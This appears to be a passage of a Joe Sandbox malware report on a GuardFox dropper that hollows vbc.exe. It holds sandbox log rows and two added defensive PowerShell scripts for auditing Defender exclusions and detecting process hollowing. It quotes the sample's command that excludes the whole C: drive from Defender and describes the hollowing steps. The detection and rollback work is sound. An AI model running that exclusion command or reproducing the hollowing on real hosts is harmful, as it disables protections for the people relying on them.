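The exclusion the hollowed vbc.exe adds above covers the entire system drive, so every later drop (including the driver written to C:\Windows\Temp) lands outside Defender's scan scope. The following script is an added example for responders, not part of the Joe Sandbox report: it lists exclusions that cover a drive root or a broad system directory, removes them, and pulls the Defender configuration-change events (ID 5007 in the Microsoft-Windows-Windows Defender/Operational log, whose message text names the changed Exclusions\Paths value) so the time of the change can be correlated with process-creation telemetry. The function names and the "broad path" patterns are this example's own choices; Get-MpPreference, Remove-MpPreference and Get-WinEvent are the stock cmdlets.

```powershell
# Added example, not part of the Joe Sandbox report: audit and roll back the
# Defender exclusion the sample adds with "Add-MpPreference -ExclusionPath C:\".
# Run in an elevated PowerShell on the affected host. Function names and the
# "broad path" patterns are this example's own assumptions.

function Get-BroadDefenderExclusion {
    # Returns exclusion paths that cover a whole drive or a broad system
    # location. $Paths defaults to the live Defender configuration so the same
    # logic can be exercised offline against a constructed list.
    param([string[]]$Paths = (Get-MpPreference).ExclusionPath)

    foreach ($p in $Paths) {
        $reason = $null
        if ($p -match '^[A-Za-z]:\\?$') { $reason = 'drive root' }
        elseif ($p -match '^[A-Za-z]:\\(Users|Windows|ProgramData|Temp)\\?$') { $reason = 'broad system path' }
        if ($reason) { [pscustomobject]@{ Path = $p; Reason = $reason } }
    }
}

function Remove-BroadDefenderExclusion {
    # Removes every exclusion flagged above; -ReportOnly just prints them.
    param([switch]$ReportOnly)
    foreach ($hit in Get-BroadDefenderExclusion) {
        if ($ReportOnly) { "Would remove exclusion $($hit.Path) ($($hit.Reason))"; continue }
        Remove-MpPreference -ExclusionPath $hit.Path
        "Removed exclusion $($hit.Path) ($($hit.Reason))"
    }
}

function Get-DefenderExclusionChange {
    # Defender records configuration changes as event 5007 in its Operational
    # log; the message carries the registry value that changed, so filtering on
    # the Exclusions\Paths key yields the time each exclusion appeared. Match
    # that timestamp against process-creation logs to find the caller (in the
    # report: vbc.exe spawning powershell.exe).
    param([int]$Days = 7)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5007
        StartTime = (Get-Date).AddDays(-$Days)
    } -ErrorAction SilentlyContinue |
        Where-Object { $_.Message -match 'Exclusions\\Paths' } |
        Select-Object TimeCreated, Message
}

# Offline check against a constructed list that contains the value from the report:
Get-BroadDefenderExclusion -Paths @('C:\', 'C:\Users\user\AppData\Local\Photo Recovery Library 5.9')

# On the affected host:
# Get-BroadDefenderExclusion
# Remove-BroadDefenderExclusion -ReportOnly
# Get-DefenderExclusionChange -Days 30
```

In the offline call only C:\ is returned (reason "drive root"); the application directory is a narrow path and is left alone. Adding an exclusion requires local administrator rights, which is consistent with the sample running the command from a process it controls rather than through a user prompt; removing one requires the same rights, so the script has to run elevated.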
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140000000 protect: page execute and read and write
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140000000 value starts with: 4D5A
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Thread register set: target process: 3288
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140000000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140001000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 14007F000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140095000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 1400A0000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 1400A5000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140186000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 14026E000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 14026F000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 140563000
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Memory written: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe base: 5380674010
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_00402460 GetModuleFileNameA,ShellExecuteEx,GetLastError,CreateThread
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
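The rows above are the classic process-hollowing sequence: the GuardFox executable starts vbc.exe with nothing but its own path as the command line, allocates an execute/read/write region at the image base 0x140000000 in that child, writes a buffer that begins with the MZ signature (4D5A) and the following sections, and then resets the child's thread context ("Thread register set") so execution resumes at the injected entry point. Only the first step leaves a process-creation record; memory writes and context changes are not visible in ordinary logs. The script below is an added example, not part of the Joe Sandbox report: it flags a .NET Framework utility that was launched with a bare command line by a parent that is not a build tool, which is exactly what the report's process tree looks like. Field names follow Sysmon event 1 (ProcessCreate); the sample records are constructed from the report's process tree and are not real telemetry, and the function names and the build-tool parent list are this example's own assumptions.

```powershell
# Added example, not part of the Joe Sandbox report: flag the hollowing
# pattern recorded above (vbc.exe started with a bare command line by the
# GuardFox dropper). Field names follow Sysmon event 1 (ProcessCreate); the
# sample records are constructed, and the helper names and the build-tool
# parent list are this example's own assumptions.

$BuildToolParents = @('devenv.exe', 'MSBuild.exe', 'VBCSCompiler.exe', 'csc.exe', 'vbc.exe', 'dotnet.exe')

function Test-HollowedDotNetHost {
    # A .NET Framework utility launched with no arguments from a parent that
    # is not a build tool is what CreateProcess(CREATE_SUSPENDED) leaves in the
    # process-creation log; the later WriteProcessMemory/SetThreadContext calls
    # are not visible there. Emits one object per suspicious record.
    param([Parameter(ValueFromPipeline)]$Record)
    process {
        $image  = $Record.Image
        $parent = $Record.ParentImage
        if ($image -notmatch '\\Microsoft\.NET\\Framework(64)?\\v[\d.]+\\(vbc|csc|MSBuild|RegAsm|RegSvcs|InstallUtil|AppLaunch)\.exe$') { return }

        # Normalise the command line: strip a quoted first token, then compare
        # against the full image path and against its bare file name.
        $cmd  = ($Record.CommandLine -replace '^"([^"]*)"', '$1').Trim()
        $bare = ($cmd -ieq $image) -or ($cmd -ieq (Split-Path -Leaf $image))
        $fromBuildTool = $BuildToolParents -contains (Split-Path -Leaf $parent)

        if ($bare -and -not $fromBuildTool) {
            [pscustomobject]@{
                UtcTime = $Record.UtcTime
                Image   = $image
                Parent  = $parent
                Reason  = 'bare command line, parent is not a build tool'
            }
        }
    }
}

function Get-SysmonProcessCreate {
    # Converts Sysmon event 1 records into objects with the same field names
    # as the constructed samples below.
    param([int]$Hours = 24)
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Sysmon/Operational'
        Id        = 1
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue | ForEach-Object {
        $fields = @{}
        foreach ($d in ([xml]$_.ToXml()).Event.EventData.Data) { $fields[$d.Name] = $d.'#text' }
        [pscustomobject]$fields
    }
}

# Constructed records mirroring the report's process tree (not real telemetry;
# the UtcTime values are placeholders).
$SampleRecords = @(
    [pscustomobject]@{
        UtcTime     = 'T+0'
        Image       = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe'
        CommandLine = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe'
        ParentImage = 'C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe'
    },
    [pscustomobject]@{
        UtcTime     = 'T+1'
        Image       = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe'
        CommandLine = '"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe" /noconfig @"C:\Users\user\AppData\Local\Temp\build.cmdline"'
        ParentImage = 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe'
    }
)

$SampleRecords | Test-HollowedDotNetHost

# Live hunt on a host that runs Sysmon:
# Get-SysmonProcessCreate -Hours 72 | Test-HollowedDotNetHost
```

Against the constructed records only the GuardFox-spawned vbc.exe is returned; the MSBuild-spawned compiler carries a real response file and is ignored. A legitimate vbc.exe invoked by a build always receives arguments, so a bare command line from an unknown parent is a low-noise signal on workstations. Note that the dropped driver the report lists, C:\Windows\Temp\VzUtW_3288.sys, carries the same number as the target PID in "Thread register set: target process: 3288", which helps tie the file to the hollowed process when triaging a host.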
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_0042EE28 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA
            Source: C:\Users\user\Desktop\dxRwXy19pq.exe | Code function: 0_2_00420391 AllocateAndInitializeSid
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe | Code function: 14_2_02D3E86A cpuid
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_0040520C GetLocaleInfoA
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exe | Code function: 12_2_00405258 GetLocaleInfoA
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_00408578 GetLocaleInfoA
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmp | Code function: 13_2_004085C4 GetLocaleInfoA
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe | Queries volume information: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exe VolumeInformation
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C:\ VolumeInformation (6 entries)
            Source: C:\Windows\System32\svchost.exe | Queries volume information: C: VolumeInformation (3 entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (2 entries)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00458670 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,13_2_00458670
            Source: C:\Users\user\Desktop\dxRwXy19pq.exeCode function: 0_2_0040F910 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0040F910
            Source: C:\Users\user\AppData\Local\Temp\is-DCS3V.tmp\873bfcef-4c55-422e-88ba-1a31e36a0f58.tmpCode function: 13_2_00455644 GetUserNameA,13_2_00455644
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\873bfcef-4c55-422e-88ba-1a31e36a0f58.exeCode function: 12_2_00405CF4 GetVersionExA,12_2_00405CF4
            Source: C:\Users\user\AppData\Local\Temp\GuardFox\ded120f6-6c1d-18da-bc8d-0195720b2895.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Lowering of HIPS / PFW / Operating System Security Settings

            Every entry in this section is attributed to a Windows system process (svchost.exe and MpCmdRun.exe), not to the sample or its dropped binaries. The sample's own tampering with host protections is the Windows Defender directory exclusion added from vbc.exe through a base64-encoded PowerShell MpPreference cmdlet, which is recorded in the signature list and the behavior graph rather than here.

            Source: C:\Windows\System32\svchost.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cval
            Source: svchost.exe, 00000008.00000002.2472107125.0000021E0A702000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Files%\Windows Defender\MsMpeng.exe
            Source: svchost.exe, 00000008.00000002.2472107125.0000021E0A702000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Windows\System32\svchost.exe WMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
            Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
            Source: C:\Program Files\Windows Defender\MpCmdRun.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara match  File source: 0000000E.00000002.2472564067.0000000002C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 0000000E.00000002.2472654579.0000000002D31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: Process Memory Space: photorecoverylib59.exe PID: 7424, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match  File source: 0000000E.00000002.2472564067.0000000002C86000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: 0000000E.00000002.2472654579.0000000002D31000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match  File source: Process Memory Space: photorecoverylib59.exe PID: 7424, type: MEMORYSTR
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_609660FA sqlite3_finalize,sqlite3_free,sqlite3_value_numeric_type,sqlite3_value_numeric_type,sqlite3_value_text,sqlite3_value_int,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_strnicmp,sqlite3_mprintf,sqlite3_mprintf,sqlite3_malloc,sqlite3_free,sqlite3_mprintf,sqlite3_prepare_v2,sqlite3_free,sqlite3_bind_value,14_2_609660FA
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6090C1D6 sqlite3_clear_bindings,sqlite3_mutex_enter,sqlite3_mutex_leave,14_2_6090C1D6
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_60963143 sqlite3_stricmp,sqlite3_bind_int64,sqlite3_mutex_leave,14_2_60963143
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6096A2BD sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,14_2_6096A2BD
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6096923E sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_malloc,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_realloc,sqlite3_realloc,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,14_2_6096923E
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6096A38C sqlite3_bind_int,sqlite3_column_int,sqlite3_step,sqlite3_reset,14_2_6096A38C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6096748C sqlite3_malloc,sqlite3_bind_int,sqlite3_step,sqlite3_column_blob,sqlite3_column_bytes,sqlite3_reset,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_malloc,sqlite3_bind_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_step,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_int64,sqlite3_column_bytes,sqlite3_column_blob,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_reset,memcmp,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int64,sqlite3_step,sqlite3_column_int,sqlite3_reset,sqlite3_step,sqlite3_column_int64,sqlite3_reset,sqlite3_bind_int64,sqlite3_realloc,sqlite3_column_int,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_bind_int,sqlite3_bind_int,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_free,sqlite3_bind_int,sqlite3_bind_blob,sqlite3_step,sqlite3_reset,sqlite3_free,sqlite3_free,14_2_6096748C
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_609254B1 sqlite3_bind_zeroblob,sqlite3_mutex_leave,14_2_609254B1
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6094B407 sqlite3_bind_int64,sqlite3_step,sqlite3_reset,sqlite3_bind_int64,sqlite3_step,sqlite3_reset,14_2_6094B407
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_6090F435 sqlite3_bind_parameter_index,14_2_6090F435
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_609255D4 sqlite3_mutex_leave,sqlite3_bind_text16,14_2_609255D4
            Source: C:\Users\user\AppData\Local\Photo Recovery Library 5.9\photorecoverylib59.exe Code function: 14_2_609255FF sqlite3_bind_text,14_2_609255FF
